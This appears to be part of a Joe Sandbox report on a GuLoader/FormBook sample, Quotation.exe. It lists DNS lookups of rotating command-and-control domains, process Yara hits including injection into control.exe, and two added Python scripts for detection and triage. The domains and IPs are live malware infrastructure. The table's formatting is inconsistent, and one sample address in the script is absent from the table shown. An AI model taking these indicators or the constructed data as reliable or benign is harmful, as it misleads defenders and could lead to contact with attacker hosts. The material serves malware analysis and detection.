Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.33.23.183 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.33.2.79 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 96.126.123.244 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 173.255.194.134 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 72.14.178.174 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:26.229600906 CET | 1.1.1.1 | 192.168.11.20 | 0xa606 | No error (0) | www.flaviosilva.online | flaviosilva.online | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 15:01:26.229600906 CET | 1.1.1.1 | 192.168.11.20 | 0xa606 | No error (0) | flaviosilva.online | | 2.57.90.16 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:40.492297888 CET | 1.1.1.1 | 192.168.11.20 | 0x6b08 | No error (0) | www.solya-shop.com | | 217.160.0.217 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:53.478986025 CET | 1.1.1.1 | 192.168.11.20 | 0xd39d | No error (0) | www.buymyenergy.com | | 45.194.145.38 | A (IP address) | IN (0x0001) | false
                                                                                                                        Mar 20, 2023 15:02:07.773430109 CET1.1.1.1192.168.11.200xb9b5No error (0)www.184411.combb.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:07.773430109 CET1.1.1.1192.168.11.200xb9b5No error (0)bb.zhanghonghong.com154.215.156.6A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:21.773844957 CET1.1.1.1192.168.11.200x2ed3No error (0)www.b-tek.media91.184.0.24A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:34.487951040 CET1.1.1.1192.168.11.200x63a6No error (0)www.dexmart.xyz199.192.26.35A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:49.039752960 CET1.1.1.1192.168.11.200x213fName error (3)www.finelinetackdirect.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:57.106502056 CET1.1.1.1192.168.11.200x4754No error (0)www.maxhaidt.com172.67.212.220A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:57.106502056 CET1.1.1.1192.168.11.200x4754No error (0)www.maxhaidt.com104.21.45.96A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)www.ghostdyes.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:23.785859108 CET1.1.1.1192.168.11.200x83feNo error (0)www.aznqmd.com23.83.160.9A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:32.398036003 CET1.1.1.1192.168.11.200xef87No error (0)www.texasgent.com81.17.29.148A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:45.096679926 CET1.1.1.1192.168.11.200x7ebNo error (0)www.brightfms.com81.17.18.196A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:00.844289064 CET1.1.1.1192.168.11.200x337eServer failure (2)www.eta-trader.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:01.021074057 CET9.9.9.9192.168.11.200x337eNo error (0)www.eta-trader.neteta-trader.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:01.021074057 CET9.9.9.9192.168.11.200x337eNo error (0)eta-trader.net2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:13.762650013 CET1.1.1.1192.168.11.200xa8c8No error (0)www.funvacayflorida.com208.91.197.91A (IP address)IN (0x0001)false
                                                                                                                        • www.wittofitentertainment.com
                                                                                                                        • www.interactive-media.ru
                                                                                                                        • www.cardinialethanol.com
                                                                                                                        • www.flaviosilva.online
                                                                                                                        • www.solya-shop.com
                                                                                                                        • www.buymyenergy.com
                                                                                                                        • www.184411.com
                                                                                                                        • www.b-tek.media
                                                                                                                        • www.dexmart.xyz
                                                                                                                        • www.maxhaidt.com
                                                                                                                        • www.ghostdyes.net
                                                                                                                        • www.aznqmd.com
                                                                                                                        • www.texasgent.com
                                                                                                                        • www.brightfms.com
                                                                                                                        • www.eta-trader.net
                                                                                                                        • www.funvacayflorida.com
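
The DNS answers above show the FormBook habit of walking a list of candidate C2 domains: one new domain roughly every 13 to 14 seconds, a mix of live hosts and parked or CDN-fronted hosts, one NXDOMAIN, one SERVFAIL that is retried against a second resolver, and two unrelated domains (www.flaviosilva.online and www.eta-trader.net) that resolve to the same address, 2.57.90.16. The Python below is an added detection example and is not part of the Joe Sandbox report. It reads rows in the table's column order (timestamp, resolver, client, transaction ID, reply code, name, CNAME, address, type, class, authoritative flag) delimited with ' | ', rebuilds one query per transaction ID, and scores each client on the number of distinct domains, the regularity of the query cadence, failed lookups and addresses shared across domains. The sample rows are a constructed subset of the table; the thresholds and the two-label registered-domain shortcut are assumptions.

```python
"""Detection heuristic for the C2 domain rotation visible in the DNS table above.
Added example, not Joe Sandbox code. Input rows follow the table's column order
(timestamp, resolver, client, transaction id, reply code, name, CNAME, address,
type, class, authoritative flag) delimited with ' | '. Thresholds and the
two-label registered-domain shortcut are assumptions."""
import json
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

FIELDS = ["ts", "src", "dst", "txid", "rcode", "name", "cname", "address", "rtype", "rclass", "aa"]

# Constructed input: a subset of the report's DNS answer rows, re-delimited with ' | '.
SAMPLE_ROWS = """\
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com |  | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:26.229600906 CET | 1.1.1.1 | 192.168.11.20 | 0xa606 | No error (0) | www.flaviosilva.online | flaviosilva.online |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 15:01:26.229600906 CET | 1.1.1.1 | 192.168.11.20 | 0xa606 | No error (0) | flaviosilva.online |  | 2.57.90.16 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:40.492297888 CET | 1.1.1.1 | 192.168.11.20 | 0x6b08 | No error (0) | www.solya-shop.com |  | 217.160.0.217 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:53.478986025 CET | 1.1.1.1 | 192.168.11.20 | 0xd39d | No error (0) | www.buymyenergy.com |  | 45.194.145.38 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:07.773430109 CET | 1.1.1.1 | 192.168.11.20 | 0xb9b5 | No error (0) | www.184411.com | bb.zhanghonghong.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 15:02:07.773430109 CET | 1.1.1.1 | 192.168.11.20 | 0xb9b5 | No error (0) | bb.zhanghonghong.com |  | 154.215.156.6 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:21.773844957 CET | 1.1.1.1 | 192.168.11.20 | 0x2ed3 | No error (0) | www.b-tek.media |  | 91.184.0.24 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:34.487951040 CET | 1.1.1.1 | 192.168.11.20 | 0x63a6 | No error (0) | www.dexmart.xyz |  | 199.192.26.35 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:49.039752960 CET | 1.1.1.1 | 192.168.11.20 | 0x213f | Name error (3) | www.finelinetackdirect.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:57.106502056 CET | 1.1.1.1 | 192.168.11.20 | 0x4754 | No error (0) | www.maxhaidt.com |  | 172.67.212.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:03:09.895483017 CET | 1.1.1.1 | 192.168.11.20 | 0x800e | No error (0) | www.ghostdyes.net | gcdn0.wixdns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 15:03:23.785859108 CET | 1.1.1.1 | 192.168.11.20 | 0x83fe | No error (0) | www.aznqmd.com |  | 23.83.160.9 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:06:00.844289064 CET | 1.1.1.1 | 192.168.11.20 | 0x337e | Server failure (2) | www.eta-trader.net | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:06:01.021074057 CET | 9.9.9.9 | 192.168.11.20 | 0x337e | No error (0) | www.eta-trader.net | eta-trader.net |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 15:06:01.021074057 CET | 9.9.9.9 | 192.168.11.20 | 0x337e | No error (0) | eta-trader.net |  | 2.57.90.16 | A (IP address) | IN (0x0001) | false
"""

def parse_ts(text):
    """'Mar 20, 2023 15:01:12.820903063 CET' -> naive seconds; %f takes at most 6 digits."""
    stamp, rest = text.split(".", 1)
    dt = datetime.strptime(f"{stamp}.{rest.split()[0][:6]}", "%b %d, %Y %H:%M:%S.%f")
    return (dt - datetime(1970, 1, 1)).total_seconds()

def parse_rows(text):
    rows = []
    for line in text.strip().splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != len(FIELDS):
            continue  # skip malformed lines instead of aborting the whole scan
        row = dict(zip(FIELDS, parts))
        row["ts"] = parse_ts(row["ts"])
        row["rcode"] = int(re.search(r"\((\d+)\)", row["rcode"]).group(1))
        row["rtype"] = row["rtype"].split()[0]
        rows.append(row)
    return rows

def registered_domain(name):
    """Last two labels (assumption); a real deployment would use the public suffix list."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])

def group_queries(rows):
    """Collapse answer rows into one record per (client, transaction id)."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["dst"], r["txid"])].append(r)
    queries = []
    for (client, txid), grp in groups.items():
        names = {r["name"] for r in grp}
        targets = {r["cname"] for r in grp if r["cname"] not in ("", "none")}
        qname = (sorted(names - targets) or sorted(names))[0]  # owner that is nobody's CNAME target
        queries.append({"client": client, "txid": txid, "qname": qname,
                        "ts": min(r["ts"] for r in grp),
                        "failed": any(r["rcode"] != 0 for r in grp),
                        "addrs": {r["address"] for r in grp
                                  if r["rtype"] == "A" and r["address"] not in ("", "none")}})
    return queries

def analyse_client(queries, min_domains=8, min_gap=5.0, max_gap=60.0, min_regularity=0.6):
    """Score one client: many distinct domains at a steady cadence is the rotation signature."""
    qs = sorted(queries, key=lambda q: q["ts"])
    domains = {registered_domain(q["qname"]) for q in qs}
    gaps = [b["ts"] - a["ts"] for a, b in zip(qs, qs[1:])]
    med = median(gaps) if gaps else 0.0
    regular = sum(1 for g in gaps if abs(g - med) <= 0.25 * med) / len(gaps) if gaps else 0.0
    by_addr = defaultdict(set)  # address -> registered domains that resolved to it
    for q in qs:
        for a in q["addrs"]:
            by_addr[a].add(registered_domain(q["qname"]))
    return {"distinct_domains": len(domains),
            "failed_lookups": sum(q["failed"] for q in qs),
            "median_gap_s": round(med, 3),
            "regularity": round(regular, 3),
            "shared_addresses": {a: sorted(d) for a, d in by_addr.items() if len(d) > 1},
            "suspicious": len(domains) >= min_domains and min_gap <= med <= max_gap
                          and regular >= min_regularity}

def detect(text):
    per_client = defaultdict(list)
    for q in group_queries(parse_rows(text)):
        per_client[q["client"]].append(q)
    return {client: analyse_client(qs) for client, qs in per_client.items()}

if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_ROWS), indent=2))
```

On the sample subset the client 192.168.11.20 scores 12 distinct registered domains, a median gap of about 13.9 s with 9 of 11 gaps within 25% of it, two failed lookups, and 2.57.90.16 shared between eta-trader.net and flaviosilva.online, so it is flagged. The regularity term is what separates this from a browser opening a busy page, which resolves many domains in a burst rather than on a timer; the shared-address term is the pivot a responder would use to cluster further domains from the same operator.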

                                                                                                                        Target ID:1
                                                                                                                        Start time:14:58:29
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:693360 bytes
                                                                                                                        MD5 hash:8A81948116D2EA79BEE1D261733DBA89
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        Target ID:10
                                                                                                                        Start time:14:59:17
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:693360 bytes
                                                                                                                        MD5 hash:8A81948116D2EA79BEE1D261733DBA89
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low

                                                                                                                        Target ID:12
                                                                                                                        Start time:15:00:36
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff764810000
                                                                                                                        File size:4849904 bytes
                                                                                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        Target ID:13
                                                                                                                        Start time:15:00:42
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\SysWOW64\control.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                                        Imagebase:0x5d0000
                                                                                                                        File size:148992 bytes
                                                                                                                        MD5 hash:4DBD69D4C9DA5AAAC731F518EF8EBEA0
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:moderate

                                                                                                                        Target ID:14
                                                                                                                        Start time:15:01:03
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                        Imagebase:0x7ff752290000
                                                                                                                        File size:597432 bytes
                                                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        Target ID:17
                                                                                                                        Start time:15:01:09
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
                                                                                                                        Imagebase:0x7ff7457d0000
                                                                                                                        File size:568632 bytes
                                                                                                                        MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
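
The process entries above record where the Yara rules fired: GuLoader in the first Quotation.exe instance (Target 1), FormBook in the second instance (Target 10), and FormBook again in control.exe (Target 13), a Microsoft binary under C:\Windows\SysWOW64 that has no business holding stealer code. The Python below is an added triage example, not Joe Sandbox code. It maps each hit's Source dump name back to its Target ID, decodes the region base address and page protection, and flags system binaries whose memory matches a malware family as injection targets. The dump-name layout it assumes (target id . phase . counter . base . protection . three flag words) is inferred from the identifiers on this page; the page itself only corroborates the target-id field (0x0A is Target 10, 0x0D is Target 13), and the process table and hit list are transcribed from the entries above as constructed input.

```python
"""Triage of the per-process Yara hits above: map each hit's dump name back to the
Target ID it was taken from, decode the region base address and page protection,
and flag Windows system binaries that carry malware-family matches, which is the
injection-target pattern. Added example, not Joe Sandbox code. The dump-name
layout (target id . phase . counter . base . protect . three flag words) is an
assumption inferred from the identifiers on this page."""
import re

# Win32 page-protection constants; values not listed here are reported as raw hex.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}

# Constructed input, transcribed from the process entries above.
PROCESSES = {
    1: r"C:\Users\user\Desktop\Quotation.exe",
    10: r"C:\Users\user\Desktop\Quotation.exe",
    12: r"C:\Windows\explorer.exe",
    13: r"C:\Windows\SysWOW64\control.exe",
    14: r"C:\Program Files\Mozilla Firefox\firefox.exe",
    17: r"C:\Windows\System32\WerFault.exe",
}
YARA_HITS = [  # (rule name, Source)
    ("JoeSecurity_GuLoader_2", "00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp"),
    ("JoeSecurity_FormBook_1", "0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp"),
    ("Windows_Trojan_Formbook_1112e116", "0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp"),
    ("JoeSecurity_FormBook_1", "0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp"),
    ("Formbook_1", "0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp"),
    ("Windows_Trojan_Formbook_1112e116", "0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp"),
]

DUMP_RE = re.compile(r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})"
                     r"(?:\.[0-9a-f]{8}){3}\.sdmp$", re.I)

def parse_dump_name(source):
    """Decode a memory-dump name into target id, phase, counter, base and protection."""
    m = DUMP_RE.match(source)
    if not m:
        raise ValueError(f"unrecognised dump name: {source}")
    target, phase, counter, base, protect = m.groups()
    prot = int(protect, 16)
    return {"target_id": int(target, 16), "phase": int(phase, 16), "counter": int(counter),
            "base": int(base, 16), "protect": PAGE_PROTECT.get(prot, f"0x{prot:x}")}

def family_of(rule):
    """Family label from the rule name (assumption: rule names embed the family)."""
    low = rule.lower()
    return next((f for f in ("formbook", "guloader") if f in low), "unknown")

def triage(processes, hits):
    """Per Target ID: image path, families matched, RWX region bases, injection-target flag."""
    out = {}
    for rule, source in hits:
        d = parse_dump_name(source)
        t = out.setdefault(d["target_id"], {"path": processes.get(d["target_id"], "?"),
                                            "families": set(), "rwx_bases": set()})
        t["families"].add(family_of(rule))
        if d["protect"] == "PAGE_EXECUTE_READWRITE":
            t["rwx_bases"].add(f"0x{d['base']:x}")
    for t in out.values():
        is_system = t["path"].lower().startswith("c:\\windows\\")
        t["families"] = sorted(t["families"])
        t["rwx_bases"] = sorted(t["rwx_bases"])
        # A Microsoft binary whose memory matches a loader or stealer did not load it itself.
        t["injection_target"] = is_system and any(f != "unknown" for f in t["families"])
    return out

if __name__ == "__main__":
    for tid, t in sorted(triage(PROCESSES, YARA_HITS).items()):
        print(tid, t)
```

Run on the entries above this yields RWX regions with GuLoader code in Target 1, two RWX FormBook regions in Target 10, and two RWX FormBook regions plus one read-write region in Target 13, with only Target 13 flagged as an injection target. explorer.exe (Target 12) has no hits listed on this page and therefore does not appear in the result, which is the gap a responder would close next by dumping it directly.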

                                                                                                                        No disassembly